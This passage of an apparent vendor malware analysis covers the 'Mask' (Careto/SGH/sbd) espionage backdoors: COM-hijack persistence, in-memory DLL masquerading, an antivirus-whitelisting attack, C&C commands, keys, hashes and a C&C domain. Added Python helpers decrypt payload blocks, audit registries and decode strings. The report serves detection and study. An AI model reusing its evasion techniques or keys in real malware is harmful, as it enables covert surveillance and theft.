The Mask’s implants can intercept network traffic, keystrokes, Skype conversations, analyse WiFi traffic, PGP keys, fetch all information from Nokia devices, screen captures and monitor all file operations. The malware collects a large list of documents from the infected system, including encryption keys, VPN configurations, SSH keys and RDP files. There are also several unknown extensions being monitored that we have not been able to identify and could be related to custom military/government-level encryption tools.

Full list of stolen file extensions:

*.AKF, *.ASC, *.AXX, *.CFD, *.CFE, *.CRT, *.DOC, *.DOCX, *.EML, *.ENC, *.GMG, *.GPG, *.HSE, *.KEY, *.M15, *.M2F, *.M2O, *.M2R, *.MLS, *.OCFS, *.OCU, *.ODS, *.ODT, *.OVPN, *.P7C, *.P7M, *.P7Z, *.PAB, *.PDF, *.PGP, *.PKR, *.PPK, *.PSW, *.PXL, *.RDP, *.RTF, *.SDC, *.SDW, *.SKR, *.SSH, *.SXC, *.SXW, *.VSD, *.WAB, *.WPD, *.WPS, *.WRD, *.XLS, *.XLSX

Inside the main Careto binaries there is a CAB file with two modules, 32- and 64-bit:

shlink32.dll
shlink64.dll

TLP: GREEN

The malware extracts one of them depending on the system architecture and installs it as “objframe.dll”. Inside the backdoor there are three executable files, once again packed with CAB and having the .jpg extension:

dinner.jpg
waiter.jpg
chef.jpg

The attackers call the more sophisticated malware SGH. We discovered the attackers trying to install multiple plugins for it. We have also found traces of lateral movement tools, such as a module for Metasploit with the “win7elevate” artifact.

2.2.1. Overview

The attackers use two software packages and several related utilities. The main software packages are named “Careto” and “SGH”. The backdoor package called “Careto” is a general purpose backdoor that consists of user-level components. It collects system information and executes arbitrary code provided by the C&C infrastructure.
The backdoor package called “SGH” is more advanced and primarily works in kernel mode. It contains rootkit components and interceptor modules for system events and file operations. It steals files and maintains its own connection to C&C servers.

In addition to “Careto” and “SGH”, we observed the usage of a custom compiled backdoor based on the “sbd” open source “netcat” clone (https://www.freshports.org/net/sbd/). This “sbd” clone has been observed in variants for Win32, Mac OS X and Linux. During the investigation, we were able to obtain the Win32 and Mac OS X versions; the Linux variant was badly damaged and could not be recovered.

While Careto and SGH can also work as “standalone” implants, we observed the C&C installing one package using the other one; for instance, a victim infected with Careto would get SGH as well. Additionally, several utilities like the uninstaller module “know” about both of them, meaning they are commonly used together, although they may have been designed separately.

Files from the backdoor packages used by the “Mask” are signed using the same certificate, belonging to a (fake?) Bulgarian company named “TecSystem Ltd.”.

2.2.2. The Careto backdoor

Careto is the name given by the attackers to one of the two main implants used on victims’ machines. Careto is a Spanish slang term, meaning “ugly face” or “mask”.

Installation module - Microsoft Windows version

The “Careto” software package is installed using a standalone executable installer. Once the installer is delivered and executed on the victim machine, it extracts the components and sets them up.
File type: PE32, Windows Executable file
Compilation timestamp: 2007.08.14 01:45:14 (GMT) (all known variants)
File sizes: 320.328, 320.904 bytes

Technical details

The files are compiled with Visual Studio 2005. There are several known versions of the installer module that contain a correct but expired digital signature:

Name of signer: TecSystem Ltd., Sofia, BG
Serial: 36BE4AD457F062FA77D87595B8CCC8CF
Valid: 2011.06.28 – 2013.06.28

Digital signature

All the important strings and the payload are encrypted. When started, the module checks for the presence of a “BaseNamedObject” EVENT with “*” in the data. If found, it exits.

The module contains three encrypted blocks in its body. The biggest one (first block) is 205.638 bytes long and is an encrypted CAB file that contains the actual payload to be installed. The second one is a 96-byte long configuration block that controls the filename to be used during the installation and the file description. In our case, the name was “objframe.dll”. To decrypt the payload’s and installer’s configuration, the attackers use a fixed RC4 key: “!$7be&.Kaw-12[}”.

The third block is 880 bytes long and contains the configuration of the payload itself. It is written into the body of the installed binary and decrypted by that binary during operation. To write this configuration block, the module searches for a magic binary string and copies the encrypted configuration block next to the marker. The resulting file is then installed into the system. The magic markers are expected to be located 0x10 bytes before the configuration block and 0x10 bytes after that block.
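Added example, not code from the report: a small carving helper for the RC4-encrypted CAB blocks that both the installer and the main module (which reuses the same key) carry in their bodies. It relies on the fixed key quoted above and on the fact that every Cabinet file starts with the "MSCF" signature; since RC4 restarts its keystream for each block, the first four ciphertext bytes of any encrypted CAB are a constant that can be searched for directly. The embedded image is constructed for the demonstration.

```python
import struct

CARETO_RC4_KEY = b"!$7be&.Kaw-12[}"   # fixed RC4 key quoted in the report
CAB_MAGIC = b"MSCF"                   # signature every Microsoft Cabinet file starts with


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4: key scheduling followed by `length` PRGA output bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 is a XOR stream cipher, so one function both encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, rc4_keystream(key, len(data))))


def find_encrypted_cabs(image: bytes, key: bytes = CARETO_RC4_KEY) -> list:
    """Offsets at which an RC4(key)-encrypted CAB begins.

    Every encrypted block starts the keystream from scratch, so the first
    four ciphertext bytes of any such block are always MSCF ^ keystream[0:4].
    Searching for that constant finds block starts without trial decryption."""
    probe = bytes(a ^ b for a, b in zip(CAB_MAGIC, rc4_keystream(key, 4)))
    hits, start = [], 0
    while True:
        idx = image.find(probe, start)
        if idx < 0:
            return hits
        hits.append(idx)
        start = idx + 1


def carve_cab(image: bytes, offset: int, key: bytes = CARETO_RC4_KEY) -> bytes:
    """Decrypt the CAB at `offset`, trimmed to cbCabinet (uint32 LE at header +8)."""
    header = rc4_crypt(key, image[offset:offset + 12])
    if header[:4] != CAB_MAGIC:
        raise ValueError("no RC4-encrypted CAB at offset 0x%x" % offset)
    cb_cabinet = struct.unpack_from("<I", header, 8)[0]
    if cb_cabinet < 36 or offset + cb_cabinet > len(image):
        raise ValueError("implausible cbCabinet %d at offset 0x%x" % (cb_cabinet, offset))
    return rc4_crypt(key, image[offset:offset + cb_cabinet])


def build_sample_image() -> tuple:
    """Constructed test data (not a real sample): a 64-byte CAB-shaped blob,
    encrypted with the Careto key and embedded at offset 0x40 of a zero-filled carrier."""
    cab_len = 64
    cab = CAB_MAGIC + b"\0" * 4 + struct.pack("<I", cab_len) + b"\0" * 4
    cab += b"A" * (cab_len - len(cab))
    image = b"\0" * 0x40 + rc4_crypt(CARETO_RC4_KEY, cab) + b"\0" * 32
    return image, cab


if __name__ == "__main__":
    img, original = build_sample_image()
    for off in find_encrypted_cabs(img):
        print("encrypted CAB at 0x%x, %d bytes" % (off, len(carve_cab(img, off))))
```

On a real installer image the carved bytes can be handed to any CAB extractor; the cbCabinet sanity check rejects probe matches that are not followed by a plausible header.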
The CAB archive that holds the payloads contains two files:

Name          File Size      Compilation Time
Shlink64.dll  144384 bytes   14.07.2009 01:16:44
Shlink64.dll  106496 bytes   14.07.2009 01:16:44

The installer is 64-bit aware and extracts the file for the appropriate system architecture: “shlink32.dll” for a 32-bit system and “Shlink64.dll” for a 64-bit one, respectively.

Installation is also Microsoft Windows version-aware. For Windows Vista and higher without administrator privileges, it installs into %APPDATA%. For previous Windows versions with administrator privileges, it installs in the %system% directory.

The installer also verifies the system configuration and makes sure it works well under all situations. For instance, it checks the “EnableLUA” value under the registry key “HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System” to determine whether UAC is enabled. If UAC is enabled, it defaults to user installation to evade any notification to the user. In case it fails to install to the system directory, the module also falls back to userland installation. The userland installation path is “%APPDATA%\Microsoft”.

In order to make the infection less obvious, it assigns itself the same file timestamp as “kernel32.dll” during installation. It also modifies the resources of the EXE being installed, so all its Version Information strings are taken from the Kernel32 DLL except the filename and file description. These are taken from the encrypted configuration block, i.e.:

File name: “objframe.dll”
File description: “Microsoft® Object frame manager”

The payload is also registered as a COM object via registry entry:

[HKCU\Software\Classes\CLSID\{ECD4FC4D-521C-11D0-B792-00A0C90312E1}\InprocServer32]
%default%=%path to the installed payload file%

The original registry value is saved in the following registry key:

[HKLM\Software\Classes\CLSID\{E6BB64BE-0618-4353-9193-0AFE606D6F0C}\InprocServer32]
%default%=%original registry value%

Main module

We were able to locate several versions of the main module. As with the Installation Module, the files are compiled with Visual Studio 2005.

File type: PE32/PE32+ DLL
Compilation timestamps: 2004.08.04 07:54:15 (GMT), 2008.04.14 02:33:02 (GMT), 2009.07.14 01:09:01 (GMT), 2012.04.25 21:05:48 (GMT), 2012.10.03 04:58:02 (GMT), 2013.01.04 04:49:18 (GMT)
File sizes: 110.592, 106.496, 144.384 bytes

Technical details

The main module is activated in every application that requests the COM object referenced by the class ID it has taken over: {ECD4FC4D-521C-11D0-B792-00A0C90312E1}. Windows Explorer appears to be the primary target of this COM object hijacking. The hijacked class is named “Shell Rebar BandSite”.

The module uses an interesting evasion technique to hide its presence in the system. Once activated, it first reads the registry value that points to the dynamic library that exports the original COM object:

HKEY_CLASSES_ROOT\CLSID\{E6BB64BE-0618-4353-9193-0AFE606D6F0C}\InprocServer32

It loads the original library and modifies the module list of the process, first replacing its own entry with a copy of the data from the hijacked DLL, and then completely removing all references to itself from the PEB LDR linked lists.
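Added example, not code from the report: an audit of an exported registry hive (.reg text) for the COM hijack described above. It flags a per-user HKCU override of the “Shell Rebar BandSite” CLSID, any InprocServer32 pointing at the payload name “objframe.dll”, and the attacker-created backup CLSID where the original value is stashed; the .reg excerpt is constructed for the demonstration, and the SHELL32.dll path in it is a placeholder for whatever the original value was.

```python
import re

HIJACKED_CLSID = "{ECD4FC4D-521C-11D0-B792-00A0C90312E1}"  # "Shell Rebar BandSite", taken over by Careto
BACKUP_CLSID = "{E6BB64BE-0618-4353-9193-0AFE606D6F0C}"    # where Careto stashes the original InprocServer32
PAYLOAD_NAME = "objframe.dll"                              # payload file name from the report
_VALUE_RE = re.compile(r'^(@|"([^"]*)")=(.*)$')


def parse_reg_export(text: str) -> dict:
    """Parse 'Windows Registry Editor' export text into {key_path: {value_name: data}}.
    Only quoted string (REG_SZ) data is unescaped; other types are kept verbatim."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else m.group(2)
            data = m.group(3)
            if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                data = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            keys[current][name] = data
    return keys


def audit_com_hijack(keys: dict) -> list:
    """Return (indicator, key_path, server_path) tuples for InprocServer32 keys that
    match the Careto pattern.  Each check is independent so a partial cleanup still shows up."""
    findings = []
    for path, values in keys.items():
        parts = path.split("\\")
        if len(parts) < 2 or parts[-1].upper() != "INPROCSERVER32":
            continue
        clsid = parts[-2].upper()
        server = values.get("", "")
        if clsid == HIJACKED_CLSID and parts[0].upper() == "HKEY_CURRENT_USER":
            # a per-user override of a machine-wide shell class is the hijack itself:
            # HKCU\Software\Classes wins over HKLM when Explorer resolves the CLSID
            findings.append(("hkcu-clsid-override", path, server))
        if clsid == BACKUP_CLSID:
            findings.append(("careto-backup-key", path, server))
        if server.lower().endswith(PAYLOAD_NAME):
            findings.append(("careto-payload-name", path, server))
    return findings


def audit_reg_text(text: str) -> list:
    return audit_com_hijack(parse_reg_export(text))


# Constructed .reg excerpt: one hijacked class, one backup key, one benign entry.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{ECD4FC4D-521C-11D0-B792-00A0C90312E1}\InprocServer32]
@="C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\objframe.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E6BB64BE-0618-4353-9193-0AFE606D6F0C}\InprocServer32]
@="C:\\Windows\\system32\\SHELL32.dll"

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Windows\\System32\\benign.dll"
"ThreadingModel"="Apartment"
'''

if __name__ == "__main__":
    for indicator, key, server in audit_reg_text(SAMPLE_REG):
        print("%-22s %s -> %s" % (indicator, key, server))
```

An export of HKCU\Software\Classes\CLSID and HKLM\Software\Classes\CLSID from a suspect host gives the input; the three indicators are reported separately because a cleaned-up payload can leave the backup key behind.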
Next, it loads one of the system libraries that is not currently loaded by the current process, from the following list:

CHTBRKR.DLL
CLICONFG.DLL
DMCONFIG.DLL
MFC42.DLL
MFWMAAEC.DLL
MSJET40.DLL
NTDSA.DLL
OAKLEY.DLL
OPENGL32.DLL
PIDGENX.DLL
PNPUI.DLL
QMGR.DLL
QUARTZ.DLL
VERIFIER.DLL
WMDRMDEV.DLL
WMDRMNET.DLL
WMICMIPLUGIN.DLL
WMNETMGR.DLL
WPDSP.DLL

After the system library is loaded, its contents are overwritten with the malicious library, but the module path and other data are kept intact. So, to someone looking with a process analysis tool, the malicious library appears as a clean system DLL in the module list of the top process. It can only be identified by inspecting the actual contents of the memory allocated to the system library.

The module transfers control to its copy by calling its DllMain function with the DLL_THREAD_ATTACH parameter and a custom lpReserved value that points to a configuration structure containing a valid magic number. When DllMain is called with these parameters, it proceeds to execute its main functionality.

First, it decrypts the CAB file from its body using the same RC4 key as in the installer module, and checks its contents.

Name          File Size     Compilation Time
dinner32.jpg  25088 bytes   14.07.2009 01:16:44
chef32.jpg    8192 bytes    14.07.2009 01:16:44
waiter32.jpg  94208 bytes   14.07.2009 01:16:44

Figure 4. CAB contents for shlink32.dll

Name          File Size     Compilation Time
dinner64.jpg  18432 bytes   14.07.2009 01:16:44
chef64.jpg    10240 bytes   14.07.2009 01:16:44
waiter64.jpg  97280 bytes   14.07.2009 01:16:44
dinner32.jpg  25088 bytes   14.07.2009 01:16:44
chef32.jpg    8192 bytes    14.07.2009 01:16:44
waiter32.jpg  94208 bytes   14.07.2009 01:16:44

Figure 5. CAB contents for shlink64.dll

The module searches for a file named “waiter32.jpg” or “waiter64.jpg”, depending on the platform.
It loads this module the same way as its own copy, replacing another system DLL in memory, executes its DllMain function in DLL_THREAD_ATTACH mode and passes the configuration structure as the lpReserved parameter. The “waiter” module is called in the “explorer” mode of operation (see “Waiter module”).

It then intercepts the “CreateProcessW” function in the libraries “shell32.dll” and “ieframe.dll” with its own routine. That routine modifies the process creation flags, forcing the process to start in suspended mode, and performs additional processing if the process being launched belongs to the list of browser filenames: “IEXPLORE.EXE, FIREFOX.EXE, CHROME.EXE”.

The module infects the intercepted browser processes by injecting all three modules from the CAB archive into their memory: “dinner”, “chef” and “waiter”. These modules are created in the memory of the target process and execution is passed to the “dinner” module by queueing an APC call to its main function. The main module notifies its “waiter” module about the injected modules and connects them using anonymous pipes.

“Dinner” module

This module is compiled as an executable, but its entry point function is only executed via an APC remote call and it accepts a single parameter.

File type: PE32/PE32+ EXE
Compilation timestamps: 2012.04.25 21:05:20 (GMT), 2012.04.25 21:05:40 (GMT), 2013.01.15 00:30:03 (GMT), 2013.01.15 20:18:55 (GMT), 2013.05.21 20:40:45 (GMT)
File sizes: 25088, 18432 bytes

Technical details

It loads the library “iertutil.dll” and patches its import from “advapi32.dll”, “GetSidSubAuthority”.
Then, it executes the command:

iexplore.exe shell.{3F9F6D47-FE76-4B11-8B70-780ED19091B1}

and also patches the “OpenEvent” and “CreateProcessW” APIs in the “URLMON” library. After applying patches to the system libraries, the module reloads the “chef” and “waiter” modules into system DLLs the same way as the main module does and invokes the “waiter” module in the “internet” mode (see “Waiter module”).

“Chef” module

This module implements network connectivity features for the package.

File type: PE32/PE32+ DLL
Compilation timestamps: 2012.04.25 21:02:09 (GMT), 2012.04.25 21:02:43 (GMT), 2013.01.15 00:27:54 (GMT), 2013.01.15 20:16:55 (GMT), 2013.05.21 20:38:23 (GMT)
File sizes: 8192, 10240 bytes

Technical details

When loaded by the “dinner” module, it returns a structure that contains pointers to four functions. These functions can send HTTP/HTTPS “GET” and “POST” requests using a given URL. The addresses of these functions are passed to the “waiter” module.

The module uses the following fixed User-Agent string for all HTTP requests:

Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)

“Waiter” module

This module implements all the logic of the “Careto” package.

File type: PE32/PE32+ DLL
Compilation timestamps: 2012.04.25 21:02:02 (GMT), 2012.04.25 21:02:37 (GMT), 2013.01.15 00:27:54 (GMT), 2013.01.15 20:17:09 (GMT), 2013.05.21 20:38:36 (GMT)
File sizes: 94208, 97280 bytes

Technical details

The encrypted configuration block is either loaded from the registry or taken from the caller and saved to the registry. The exact location of the registry key is read from the configuration block.
Known locations are:

HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\WindowsUpdate
CISCNF4654
CISCNF0654

Figure 6. Decrypted configuration block

In “explorer” mode, it stores the handles of loaded modules and monitors process termination to free unused handles. This is another example of how careful the Careto authors were to make sure the infected machine stays stable and the infection goes unnoticed by the victims.

When executed in the “explorer” mode, it waits 60 seconds for the dinner/chef pair to be properly loaded in the browser’s process. Once there is such a process, it sends a command to its instance injected in the browser, activating the connection to the C&C server.

When running in the browser’s process (“internet” mode), it enters an infinite loop waiting for commands from the anonymous pipe provided by its “explorer” mode instance and handles all C&C communication when requested.

The C&C server provides the commands inside CAB files, one archive per request. The archive is expected to contain a text file named “Meta.inf”. This file contains various configuration parameters and commands to be executed by the module.

#Wed Oct 09 14:55:09 BST 2013
AIT_PARAMS=-s -h -n -t -p -w 0
DLL32_FILE_NAME=CDllAIT32.dll
DLL64_FILE_NAME=CDllAIT64.dll
DATE_GENERATION=20131009T145509.009
TYPE=CMD
CLIENT_ID=Client0650
CMD_SEQ=0001
INST_ID=4499149305321491
SUB_TYPE=CANNEDDLL
TARGET_PROCESS=explorer
PRODUCT_CODE=C314
W=0

Sample Meta.inf file

The commands can be executed either in the module injected in the browser, or by the original instance loaded via COM spoofing. The “TARGET_PROCESS” values are “internet” and “explorer”, determining the operation mode.
Below is the full list of implemented commands:

UPLOAD        Write a file from the CAB archive to the infected machine. The location can be relative to a CSIDL or environment variable.
EXEC          Launch the specified executable with parameters.
UPLOADEXEC    Write a file from the CAB archive to the infected machine and then run it with the given parameters.
SYSTEMREPORT  Compile a system report and upload it to the C&C:
              ● main module's file name
              ● proxy server settings
              ● list of installed programs
              ● OS version, type, Service Pack version
              ● list of network adapters' MAC addresses
              ● availability of direct connection to www.microsoft.com:80
              ● values of environment variables
              ● list of users
SETLATENCY    Modify the delay before operation in the configuration block and update the registry. Report back in “SetLatencyLog.txt”.
CANNEDDLL     Load the executable module from the CAB archive and execute it in memory.
SETCFG        Modify the data of the encrypted configuration block: primary or secondary URL of the C&C server, number of attempts to try for each of them.

2.2.3. The SGH backdoor

The SGH backdoor is a lot more sophisticated than the Careto implant. It is designed to perform a large number of surveillance functions, on a highly modular platform that can be easily extended.

Installation module

This module installs the complete SGH software package using a custom installation script that is encrypted in its body.

File type: PE32 EXE
Compilation timestamps: 2013.05.09 11:20:08 (GMT), 2013.06.19 11:17:45 (GMT)
File sizes: 348264, 359936 bytes

Technical details

The files are compiled with Visual Studio 2005. One version of the installer module is signed by a certificate from the same (fake?)
company TecSystem Ltd from Bulgaria:

Name of signer: TecSystem Ltd., Sofia, BG
Serial: 0E808F231515BC519EEA1A73CDF3266F
Validity: 2013.04.18 – 2016.07.18

Digital Certificate

The SGH package is somewhat special and it is what originally attracted our attention to this cyberespionage operation. When started, it first tries to exploit a vulnerability in older Kaspersky products. The attack works as follows: first, it tries to open a handle to the Kaspersky system driver, “\\.\KLIF”, and sends a custom DeviceIoControl code. If the call succeeds, the module and all processes named “services.exe” are no longer checked by the antivirus engine. This method theoretically allows the attacker to survive the addition of signatures for the malware components, as the product won’t be able to detect them because they have been “whitelisted”. In practice, we can say the attack is only half baked, because detection for the other top modules will precede SGH and kill it before it loads. Nevertheless, it was this attack against our older products that brought our attention to Careto and allowed us to discover it in the first place.

The SGH module is relatively complex and has many functionalities, but in essence it is an infinitely extensible attack platform. In addition to the default plugins available in the installation module, the attackers can also deploy other extensions to perform more complex tasks. To operate, SGH uses encrypted virtual file systems that store extensions and activity logs.

On startup, the module locates a PE section named “.inf” in its own file. This section contains the encrypted and compressed binary installation script. The section is decrypted with RC4 using a hardcoded key and then unpacked with zlib’s inflate function.
The installer parses the script, executes all the commands and then deletes its own file and exits.

The installation script is a list of binary tagged entries of variable length. Entries can be of one of the following types:

1, 19  Depending on the additional parameter, operate in one of the following modes:
       1. Install the file into the victim's system
       2. Download a file from a given URL (http, https, ftp, gopher) and either install it or treat it as an additional installation script.
       The file can be installed into a directory of choice:
       - system directory
       - temporary directory
       - system drivers directory
       - other location specified in the installation entry
2      Remove a previously installed file
3      Write a registry value. Create the key if necessary.
4      Delete a registry value or a complete registry key, recursively.
5      Copy data from one registry value to another
6      Compare a registry value's data with the specified value. Abort the installation if the values are not equal.
7      Create a new system service
8      Delete a system service by name
9      Start a system service by name
10     Stop a system service by name
11     No operation
12     Create a process with given arguments
13     Show a message box
14     Append to an existing registry value
15     Add a USB device filter via Windows Setup API
16     Remove a USB device filter via Windows Setup API
17     Add a certificate to the system Certificate Store
18     Delete a certificate from the system Certificate Store
20     Exit if the installer is NOT running in a virtual machine
21     Exit if the installer is running in a virtual machine
22     Infect the system “bootmgr” file with provided code
23     Write the buffer to a temporary file with prefix “___” and execute it

The installer module can detect if it is being executed in a VMware or Microsoft Virtual PC virtual machine. We have discovered two different installation scripts so far.
The decoded versions of these scripts look like the following:

Script 1:

Install file(SystemDir, awdcxc32.dll, 8192 bytes)
Install file(SystemDir, mfcn30.dll, 17920 bytes)
Install file(SystemDir, vchw9x.dll, 20992 bytes)
Install file(SystemDir, awcodc32.dll, 24576 bytes)
Install file(SystemDir, jpeg1x32.dll, 31744 bytes)
Install file(SystemDir, bootfont.bin, 122912 bytes)
Install file(DriversDir, scsimap.sys, 14464 bytes)
WriteRegistry(80000002\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters, EnablePrefetcher)
CreateService(scsimap, System32\DRIVERS\scsimap.sys)
WriteRegistry(80000002\SYSTEM\CurrentControlSet\Services\scsimap\Params, Value)
StartService(scsimap)
WriteTempExecute(9320 bytes)

Script 2:

Install file(SystemDir, awdcxc32.dll, 8192 bytes)
Install file(SystemDir, mfcn30.dll, 17920 bytes)
Install file(SystemDir, vchw9x.dll, 20992 bytes)
Install file(SystemDir, awcodc32.dll, 24576 bytes)
Install file(SystemDir, jpeg1x32.dll, 31744 bytes)
Install file(SystemDir, bootfont.bin, 126880 bytes)
Install file(DriversDir, scsimap.sys, 14464 bytes)
WriteRegistry(80000002\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters, EnablePrefetcher)
CreateService(scsimap, System32\DRIVERS\scsimap.sys)
WriteRegistry(80000002\SYSTEM\CurrentControlSet\Services\scsimap\Params, Value)
StartService(scsimap)
WriteTempExecute(10344 bytes)
Install file(SystemDir, siiw9x.dll, 15360 bytes)
StartService(ipfilterdriver)
WriteRegistry(80000002\SYSTEM\CurrentControlSet\Services\IpFilterDriver, Start)

It’s important to point out that the file names used for the DLLs during installation are not unique and are also used by legitimate software. For instance, the driver named “scsimap.sys” was present in older versions of Windows.
If the installation script was executed successfully, the infected machine now has a new system service named “scsimap” that loads the main SGH driver “scsimap.sys”.

SGH plugin modules

The following table provides the full list of plugin modules and a brief description of their functionality.

Module name       Functionality
Scsimap           Orchestrator module for the platform components
Config            Operates configuration data in registry
Storage           Used to store activity logs in the system
Cipher            Provides cryptographic functions to other modules
Cmprss            Provides compression functions to other modules
Loaddll           Injects DLL payloads into processes
PGPsdkDriver      Keylogger
Fileflt           Intercepts file operations and collects content
Stopsec           Implements an attack against Kaspersky products
TdiFlt, TdiFlt2   Intercept network traffic
awdcxc32          Interacts with scsimap driver from user mode
awcodc32          Interacts with C&C server via vchw9x module
mfcn30            Provides a framework to extend the malware with new plugins
vchw9x            Provides network connectivity functions
jpeg1x32          Used for uninstalling the malware
siiw9x            Screen saver module
SkypeIE6Plugin    Intercepts and records Skype conversations
Nmwcdlog          Gathers information from Nokia devices
d3dx8_20          Takes screenshots of victim’s desktop
WifiScan          Retrieves the list of WiFi networks
awview32          Collects victim’s email messages
CDllUninstall     Uninstalls malware

For a detailed description of the modules, please check APPENDIX 2: SGH Modules.

2.2.4. The SBD backdoor

In addition to Careto and SGH, the “Mask” attackers use another backdoor based on the public, open source “netcat” clone “sbd”. “sbd” stands for “Shadowinteger's Backdoor” and has been available at least since 2004.

Figure 7: Original sbd copyright notice

This backdoor has been observed for Win32, OS X and Linux.
The Linux variant gets installed from the exploit server “linkconf[dot]net” through the Firefox plugins. Unfortunately, the plugins we retrieved from the server were badly damaged and could not be recovered. Nevertheless, they do seem to exist and are in use by the Mask attackers.

The Mozilla Firefox plugin which installs the Linux “SBD” backdoor:

Archive: af_l_addon.xpi
Name                 Length  Method  Size   Ratio  Date      Time   CRC-32
chrome.manifest      183     Defl:N  101    45%    10-07-13  14:30  cc37d585
install.rdf          1274    Defl:N  443    65%    10-07-13  14:30  add50a10
bootstrap.js         1798    Defl:N  695    61%    10-07-13  14:30  52eecaba
content/browser.xul  166     Defl:N  134    19%    10-07-13  14:30  74e9bad7
content/icon.png     66793   Defl:N  66664  0%     10-07-13  14:30  27609d6e
plugins/sbd-linux    26020   Defl:N  22406  14%    10-07-13  14:30  a02b2e21

The Mozilla Firefox plugin that installs the “SBD” OS X backdoor:

Archive: af_m_addon.xpi
Name                 Length  Method  Size   Ratio  Date      Time   CRC-32
chrome.manifest      183     Defl:N  102    44%    10-07-13  14:30  aeac29ae
install.rdf          1274    Defl:N  443    65%    10-07-13  14:30  f5ee7026
bootstrap.js         1796    Defl:N  695    61%    10-07-13  14:30  d5fc6c9b
content/browser.xul  166     Defl:N  134    19%    10-07-13  14:30  74e9bad7
content/icon.png     66793   Defl:N  66664  0%     10-07-13  14:30  27609d6e
plugins/sbd-mac      42720   Defl:N  37072  13%    10-07-13  14:30  12d19684

We were able to recover a working copy of the OS X “sbd” backdoor, which we describe below.

2.2.5. The OSX SBD backdoor

The original OS X dropper found on the exploit server has the following identification information:

File name: banner.jpg
Type: Mach-O x86 32 bit binary
MD5: 02e75580f15826d20fffb43b1a50344c
Size: 46876 bytes

Identification details

This is a dropper for the main SBD backdoor. First, it copies the standard Safari application to “/Applications/.DS_Store.app”.
Next, it creates the file “/Applications/.DS_Store.app/Contents/MacOS/Update” and unpacks the main backdoor code into it. The installer carefully copies the timestamp from the original Safari “Contents/Info.plist” to the backdoor, to make it harder to notice. For persistence, it modifies the “/Applications/.DS_Store.app/Contents/Info.plist” file with a reference to the main backdoor body, also carefully setting the timestamp on the “.plist” file, and then registers it in the system via “Library/LaunchAgents/com.apple.launchport.plist”.

The “.plist” and main backdoor body are stored in the dropper in compressed (“bzip2”) format. They have the following identification information:

Main “SBD” backdoor, OS X:
Type: Mach-O x86 32 bit binary
MD5: 1342ac151eea7a03d51660bb5db018d9
Size: 89828 bytes

“.plist” data:
Size: 582 bytes
MD5: 4dae42d1b80c85b396546ed02a00e328

The Mask’s version of the “sbd” backdoor has a hardcoded C&C server, to which it connects on port 443. The attackers can then directly access the victim’s machine through a shell. All important strings in the backdoor are encrypted with a simple XOR: for even positions, it is XOR 0x7f; for odd positions, it is XOR 0x10. The C&C communication is encrypted with AES and uses SHA1 for cross-authentication. The encryption key used for communication is the following string: “/dev/null strdup() setuid(geteuid())”.

The server address is encoded in the binary as follows:

Figure 8: Encoded C&C address

After applying the decryption algorithm, we get the real C&C address: itunes212.appleupdt[dot]com

By means of passive DNS fingerprinting, we identified two other domains used by the attackers as C&Cs.
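Added example, not code from the report: a string decoder for the position-dependent XOR scheme described above (0x7f at even positions, 0x10 at odd ones). Because XOR is its own inverse the same routine obfuscates and recovers a string, so the sample string table below is built here from strings quoted in the report rather than carved from a real binary; the NUL-delimited table layout and the phase fallback are assumptions of this example.

```python
EVEN_KEY = 0x7F   # XOR key for even positions (from the report)
ODD_KEY = 0x10    # XOR key for odd positions (from the report)


def sbd_xor(data: bytes, phase: int = 0) -> bytes:
    """Position-dependent XOR used by the Mask's sbd build.  XOR is an involution,
    so this one routine both obfuscates and recovers a string.  `phase` shifts
    which positions count as even (0 = count from the start of the string)."""
    return bytes(b ^ (EVEN_KEY if (i + phase) % 2 == 0 else ODD_KEY)
                 for i, b in enumerate(data))


def _is_printable(s: bytes) -> bool:
    return bool(s) and all(0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D) for b in s)


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """Decode a NUL-delimited table of obfuscated strings.

    Positions are counted from the start of each string, as the report
    describes.  If that yields non-printable bytes the opposite phase is
    tried, which also covers a build that keys the XOR to the buffer offset
    rather than the string start (the two differ only for odd offsets)."""
    found = []
    for enc in blob.split(b"\0"):
        if len(enc) < min_len:
            continue
        for phase in (0, 1):
            dec = sbd_xor(enc, phase)
            if _is_printable(dec):
                found.append(dec.decode("ascii"))
                break
    return found


# Constructed sample table: strings quoted in the report, obfuscated with the
# scheme above and packed NUL-separated the way a string table usually is.
_PLAIN = [
    b"/dev/null strdup() setuid(geteuid())",   # AES key string from the report
    b"itunes212.appleupdt.com",                # decoded C&C host from the report
    b"/Applications/.DS_Store.app/Contents/MacOS/Update",
]
SAMPLE_BLOB = b"\0".join(sbd_xor(s) for s in _PLAIN) + b"\0"

if __name__ == "__main__":
    for s in extract_strings(SAMPLE_BLOB):
        print(s)
```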
